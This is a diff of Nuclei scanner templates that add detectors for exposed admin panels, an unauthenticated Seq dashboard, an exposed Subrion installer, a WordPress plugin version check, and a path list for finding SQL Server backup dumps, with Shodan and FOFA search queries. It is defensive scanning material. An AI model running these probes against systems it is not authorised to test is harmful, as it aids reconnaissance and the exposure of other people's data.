# digest: 4a0a0047304502201cd4fb8e5b9edfdabb9e51e1946d869a78dd98154c64ba176d3ea231e5ad3ae7022100dd971809685c9e08b8e5fe39100d2d2da8f722f1ab83022653d06091daae5ca6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
id: apache-apollo-panel
|
||||
|
||||
info:
|
||||
name: Apache Apollo Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Apache Apollo"
|
||||
tags: panel,apache,apollo,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/console/index.html"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Apache Apollo - Admin Console'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
id: dialogic-xms-console
|
||||
|
||||
info:
|
||||
name: Dialogic XMS Admin Console - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Dialogic XMS Admin Console"
|
||||
tags: panel,dialogic,admin,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Dialogic XMS Admin Console'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
id: endpoint-protector-panel
|
||||
|
||||
info:
|
||||
name: Endpoint Protector Login Panel - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Endpoint Protector - Reporting and Administration Tool login panel was detected.
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.title:"Endpoint Protector"
|
||||
tags: panel,endpoint,login,detect,endpoint-protector
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Endpoint Protector - Reporting and Administration Tool"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,61 @@
|
|||
id: sql-server-dump
|
||||
|
||||
info:
|
||||
name: SQL Server - Dump Files
|
||||
author: userdehghani
|
||||
severity: medium
|
||||
description: |
|
||||
A SQL Server dump file was found
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 21
|
||||
tags: exposure,backup,sql-server
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}{{paths}}"
|
||||
|
||||
payloads:
|
||||
paths:
|
||||
- "/sa.bak"
|
||||
- "/wwwroot.bak"
|
||||
- "/backup.bak"
|
||||
- "/database.bak"
|
||||
- "/data.bak"
|
||||
- "/db_backup.bak"
|
||||
- "/dbdump.bak"
|
||||
- "/db.bak"
|
||||
- "/dump.bak"
|
||||
- "/{{Hostname}}.bak"
|
||||
- "/{{Hostname}}_db.bak"
|
||||
- "/localhost.bak"
|
||||
- "/mysqldump.bak"
|
||||
- "/mysql.bak"
|
||||
- "/site.bak"
|
||||
- "/sql.bak"
|
||||
- "/temp.bak"
|
||||
- "/translate.bak"
|
||||
- "/users.bak"
|
||||
- "/www.bak"
|
||||
- "/wp-content/uploads/dump.bak"
|
||||
- "/wp-content/mysql.bak"
|
||||
|
||||
headers:
|
||||
Range: "bytes=0-500"
|
||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: binary
|
||||
part: body
|
||||
binary:
|
||||
- "54415045" # Microsoft Tape Format
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022072a945593a108233b78d522957d9af7d24b173838e3aa723b397c4f4022d4b490221009687a108664b7872ce93592d205de6492aac7b48f4c54e79705a5aba0a19976e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -29,3 +29,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -29,4 +29,4 @@ http:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
@ -29,3 +29,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,34 @@
|
|||
id: subrion-installer
|
||||
|
||||
info:
|
||||
name: Subrion CMS Web Installer - Exposure
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
Subrion CMS Web Installer has been exposed.
|
||||
reference:
|
||||
- https://github.com/intelliants/subrion
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="Subrion CMS Web Installer"
|
||||
tags: subrion,cms,install,misconfig
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Subrion CMS Web Installer"
|
||||
- "Installation wizard"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,35 @@
|
|||
id: seq-dashboard-unauth
|
||||
|
||||
info:
|
||||
name: Seq Dashboard - Unauthenticated
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
Seq is exposed without authentication
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Seq"
|
||||
tags: misconfig,exposure,seq,dashboard
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/#/dashboards"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Log out'
|
||||
- 'dashboards</a>'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100c7ab34a8c3cc7a822e231234bf9219a7871da15512d3e1b36aae8280a84d3bc1022054c06ec0a44dfe3fcef3cc55d8261b322c83508974596a08cc762802410aeaa1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,32 +0,0 @@
|
|||
id: vercel-takeover
|
||||
|
||||
info:
|
||||
name: Vercel Takeover Detection
|
||||
author: brianlam38
|
||||
severity: high
|
||||
description: Vercel takeover was detected.
|
||||
reference:
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/pull/375
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/183
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"The deployment could not be found on Vercel"
|
||||
tags: takeover,vercel
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- Host != ip
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "The deployment could not be found on Vercel"
|
||||
# digest: 4a0a00473045022100e9c2a259ba4561334fd4151612f11c27bfbf48680673b341eff2ff5bdefaf4d502206f94af7c8b41af543a3a1fee972d294859b0b1dae336394ad15d4f9d8366bcb6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a0047304502200f97c9f6cf51bc9e7136155d1ebd47c4965cd9479e9af2808895f06718a839eb02210089552a6a15cfd411655af54f1cd95d9309942d13f7ce470422f500de770c507b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205f05206783188c54dc0cc8bac49757430473e73578d0cfe1847b8bba26b02639022100c274746344a8a5787a9cafff574745182577de6affb1715b0ea8a3f166bfa332:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a0047304502202b0dea2a98ca2ffcd00ea8f65b9c87360f28242dd23dfb5996cfd466cce5cec2022100d6d29c1120687dc26a5169c8c979880a9c558a858d08ca0c05729f37b4084306:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ef832f58b4d5b371d998884eff933195bd61db8c52b92ce76961e333fe4072b00220233972cc00d8e6e78cc52132086ecbb8f11afb6e367c1069ef6d01d4dbc5be34:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a00483046022100dec8b27ec9c8c349bee77b231bbd05dbbd56f1b9f1888cffcbb642a851d7b787022100bffb3b907c8eaa027a8c782ef4716d0dc028fc3f8eb3562c38fdc4166149fe86:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502210086fcb1b231bfd4e7aba807991c371d9ee7cfb51276814ff0f269ab15039e62d002206cadbf8efaa306ecad28873815b86d70020da12de58ddd9e164e51473aadf09d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100e812876c0c926937ab99728aa69c91592d0297606e423a58dcc516b6184fe91502205c17f816e9f834b8bb50f5df5bf3d4dca879b8749db560dcc70c89909a92f4b0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205db6d0fd6661bf5bb55f1058ebf5b4c1479cb9c5642beaea9c4c3784e21a95bb022100d15584ee1fd7f027a6b2be1b6f1f1b3a664838d90ab125eb8a5b444126d4fe71:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022050c3c662668cd27c75004f1483145ff944dd4e76fdd654ce398de7b8717766b9022100d1706f67e5dcbda31fa2409fb77acb245ade2fe6e30790ab4e6cdd25772f3e71:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100daf8d56751aea85cbb9670c0a67be5db01afc396f349294857e8c27e22dc79520220331cb77fcb7121c4c2274413917e0df23eb92f5e7540a3575e86156f3eb71c1d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022038eb0e210ce108cd7a9c936b4e5a2312946ab1a48b9f62ad39cb4b89393b9a08022100c12a3e6c5dce5779c669fcd2adb3422b7f8e4a2e0841212b5de1d0c2e802ba15:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100d04f8374578ec823707829ed62fa581d4d03a7ad0d95e7c915f0e495416ca3e402200d8518f2b807e7bc8f7c59464c7dc118c8ce7a0795b57140b5094efb9ff58bee:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100c6404220df1d8371d8d5ef524ec4ea0a952295b90731ef349ec6121497ed98310220469201578d660f92f1b6105ca0255a7b3b5344b4ace7f49bfbb4ac0d0005f47f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100fc934984adaaed3a68bc7e24c61b3eeb2acadea8ac1f7fecfc9dff85b37ba3ad022100f2934973261d5d3efd964a22573555066959976c154e0020843ddbc663ee918d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a00463044022017f4c1a49c49999e1961701d683353e6067013193e7e99aef20ca32b2c69b50d0220494c76083779882786dedc7cb44f525003684fb5abf51f8cd231420cc6787ec2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100e15e65dd0bb9a24a74326bd56e1656a329b0dd589c9dc0c3060a9ea12d57157402200463487876247765e53cc72e8838047f554c35df9e3685bdd385fa899a3bc9fe:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100819ca20c4a2a165b38eceef856975fe563ed0bc24e1ca8689985e3664dc9a3880220553f6c13a6f06d91c0857b198e30b526a8400d676c24bf2df7ad1486a4909926:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022000f21680c9f1a1add192e3b21fedf0b07a925ce67c4a1d7a9fe0a4be3c021bbc022100b5eba060bd31874f3ce027a042a30ff32d43578645b30c99d756e5ab3d3882e1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a0046304402205dcb80be4535b522828d22f4f705f941b909bf8184541bc390524ca2a12d731e022062790b398253283a1c2b9ec09386a9f9dce60ac2e15ec5b858aa54ba36b09719:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220340fa90839e32a95e7eb758f99477fa301feed4a0a53a2acd848c3ae77b615430220778d50c5f21069f937b9cadf278300a8b358c13102e90e80356886da87a2ef2f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022067d53904a19619a1696cdef2fe66798d29691de8794ff19881e006a49c696fcb022100d84bcf0356ee21ab40af757c6b3d179fdb1ee94c374ebd504f507ec71121fa76:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502201d932003913236331c68d2782d798a25d5a47e3d65d897171857d02732a38e77022100d7dfca11755d9e91433a29f051ce0099cbed6610987b398f58f9b3482d59559c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a0046304402200d3dd7b32f21547074baf6756e7899bad2830b1036eec55b94f0963c6491f33502206323cd785021d58bca2ee64f548e5a3e75caf1dd1d52fc66d7775603e8792d36:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b85eb4081b46abb2268064e3440c8c1b15a282a11dca509996ec38806b3ffaa2022100f6e24f692648a1e6726d474d580c432cb5b3754b93938236eeec269623b81786:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022016634830079b47a41c3a80e549a8916d7824eb5a60b1ea2e3275accc10889288022100b8e15fc0e6b8e728ba82a2fd5932e9412ecc130946902c3b08e6366c30999bcc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204d6061e3a08480c9d209f1efe4a22669148f07e4b5e0e3025598eaad27c3d992022100ec11c1ee659ad94520bc929d5fd1bd84b9739134c4754040d5f2047fe5394361:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022069ed23484c27c6452e8f02b35b3e91201c94d3f1e0b938a7ea29d1c42869599c022100bc0557454d66d151101fdd75ac27dafbdef2f808e57f887edc711341f14032a2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207f61bd4468140628fbb3d20f12365ae8916333e443d7dce65be3392278c9d68a02206050779c02c5d275f89836f8df60c3ebadc73049d8ef289540dd408b39a5a51c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a00483046022100dde3df3436f6a643e2131a0f20de65a6cebc5eac3a306c7677c5c5dd855e4806022100f36a886c8f91b9bb592cab143a3c5d7a42ab00524043730ed95b90dba6ad657d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100eacb2511c79ec05b60206bdcb5926aa96f7c71918418799e287a61d78f527d3f0221009fee4e29e8f5720496caf1f65292baddbdf947da1a4e289fc2fd75bc4e847e02:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a00463044022006847af405b3fa72a1fcab9457c191da36a2c449fb0a805092b1fb563e458d1f0220747f3aa90ce78172cb77a5131fdb554a6f6d2867ba7591f0717cfaf731e13aad:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b47de9242bdb013a68cf46e6c1775c6ca2497d0bd1748291d7e0d5ec9c81efc9022100b2fc888a578accfc54f3be1cca29b3951230d50448b8bf549c8f1639fb5ad726:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a004730450221009017a7afed4d073047c7aebdb2c04eff82e6e755501d94b1afa71129ad03bc80022007329ef664c9b3183354505ba7b8a7465ab322bc6ca274bfc37bf4a7d1657696:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502206e3251059050ad6385310b93d5b6596cb5328aac5a4ebdc875caeefa38708943022100bce0b885eaa0241d23e6a6bde464c5c46132857beb8d1655b5a7caf9ff286ef4:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a004730450221008680804645512ff17fb1d71ceca040e7b8824ba675082411a5541633f69fb00402204ba2e3144f1541f7d8d8e283cacbe13bbab11ed6034c7f6305c7ce36d2329c1e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022024573b6b0b0499c49cb82cc7cd2276397ffeea265e844fa47dc456e8a8660dc9022064fd27f1ff67f58de1a40c5016a943d2a3d92ea43ee3ae91b8c3e52dc738d08e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -9,7 +9,7 @@ info:
|
|||
metadata:
|
||||
plugin_namespace: broken-link-checker
|
||||
wpscan: https://wpscan.com/plugin/broken-link-checker
|
||||
tags: tech,wordpress,wp-plugin,top-200
|
||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a004630440220041c841fa64555bdbc1c89643473afb676b0a809e579d6ccecea43535f7340f10220275b88182336fa1471c61987fe490a01afa4d07c349cce99dcb3d0803addd447:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022035b29d9f6b3a3ff9da1797f385c1735f9da3c4ff33e3767550148e932596aad7022100ee038b71ec277f0c349175dcb499b0963f90a08eeef925437f55a937f86be405:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: wordpress-chaty
|
||||
|
||||
info:
|
||||
name: Floating Chat Widget' Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://wordpress.org/plugins/chaty/
|
||||
metadata:
|
||||
plugin_namespace: chaty
|
||||
wpscan: https://wpscan.com/plugin/chaty
|
||||
tags: tech,wordpress,wp-plugin,top-200
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/chaty/readme.txt"
|
||||
|
||||
payloads:
|
||||
last_version: helpers/wordpress/plugins/chaty.txt
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: internal_detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "outdated_version"
|
||||
dsl:
|
||||
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a00463044022019718774de49a1c210d65a2ec84cb1ff3df3c44d2c0f72da4b3421e13032b3bb02204e181ee4990718fc83e1a0dbd2b5fd651e1b134a6b8cb65352d30a6eac6fcf16:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a0048304602210088b15741047608265b94052a660d0eb3b8550936c34e383b1fb5897bb34f523602210082d72638a988e7f89afad62220998a42f24f049a4396c1c106fe614affb4dbb5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022002f7ffdbfda37feab71d266ca655d1734f37a2197280e70da7da4d3ea629e8cb022100fdbc5a03cb59a59013f42b8aa85103055f1a62ab1d122aa70a4bb833d4071b86:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100f78b03e6915e19340e34a1a9c86f1862dde9329a3deb226842cc5acbe2e3aabe022063872f478535cedababafb4ed2c2b5fcb0ef7a7fd2cf1a5e95bc34acd5f253db:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100d7efc51d92c32c0529e0841dd3d182e13f915658a078b4d83ae319769c4d06eb022100e9715e1b522df9abe907d3717b79cc5aacac98d8f26209cee361a44a37f7be6a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100e9548a6ea0733c20702dfdafe79cc446f1dbd88df7437564f8a1aa253791bfea0220340c1527c5a11b7c270941f19cc704fbfac58a2001835257d89941b1edacad77:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100bdc2aa3e799f768eb46bbe9b4485a43da886ef255c317d52bb1e2fd2438f8ad3022100fb71712addc983da8cfd7e1a8ff3c45941cd225daf0581010dd33dabd4731bf4:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100fe0f2a501cd01fbd29e16751a93bd64022eafdc9fae2b59c1f29e5937f82180b022046800d084c63e04588e0ce0e7136bc50619c3f5e467864545770f04872a512e3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220776166b36e4a56bfb0f1162edaffc08c0ad3c0119c26f5b94373b0274fad4f60022100f15006ef96b5618784f6aa78cb46c986410f4dbc0dd99470d05ea1a5fbb442b8:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a004730450220694bc544a88da2b2fecb68f0e8a5cd28c032de588588833de4a5a2e830d4e1b202210091be2781e6b1a03b882be7a22a7e3ae55f51213667b60159d335ccce85e218de:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221009d9f48e9857e7e64bfa90e25b9f289bf6ce0772481398131d14faa7037f66e60022100b348a94c976d450274886a6f836dbfb87f3c95d92b9117e136b92e8f61e893dd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100b83d5f9bb7de4b90e030aa3cd4ffceb28be74dee65b24db29b8bc5ac2a4b67a6022053d18c5fc1ba2ca587a33b621907603cb80e1a10bc8a4fc744cd281b05e8c69d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100cdae23a76e7db806ebb974d64b0934136dbdb9e8c1420baed851adcca0dc34eb022100a80aebf08394076bfe8eacad9341774822ff99d46965f26c5ddfba3d6be50c9e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022077cdd2caeadf67bc68aafce986756c6bfd50db6b2ff5374b7d789ee0f4964bbd022100ec376af18037764d6d6496d31612564a9d0408b7f0c84c48fe851288f1bebebf:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402201eee9e73d38f379394aeeffc30a02b88fb4e1f2cce7cddc7e9625f88f5699e3b02203a1f852c1185fb7ccf73f4618df01a23bb556edc78e0272941820d53a6c9b790:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a004630440220384289cf52c3ea26b485f74e99490b805f64a4a23fb55f9e7701bf98e14d878502205ad5b70aeab8ed7cdf073c96cd336ce3109625b84c56cdf2dbde0b1aa1b46707:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205621f4d15e4e7ed33a36dc8fa7e3137216cd11507f6ddb15ac34be6a824e6c58022100833c1b303e631dbbabecddd668fd9166dded6b6cd196a3885f6b0f6711c6910e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a00483046022100e82af05065a166759b5ee7f4f0ea85c1fb4f7112aea4fb3f8d8d28b3649b2cfd0221009bed13134b379db57804bfbb48726f05f5fb7f811a2238631db34d630f59ac09:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100f3192c3175aed17e526ca15acd5f1b6594e64d760831adf95937ae23700d17c0022061ef94cc7a00dd70efac559085df36cd4c8a6cd6d285b6529a83c2a2191959c0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100af4f80223048e10d866ca1c1a15cdcdf8b2ecb21d28b4efa808704483b8089ac02203e666be67212b3bd922895e6b5487b9efb6d96018efd143b166d45dd6a8a0551:922c64590222798bb761d5b6d8e72950
|
||||
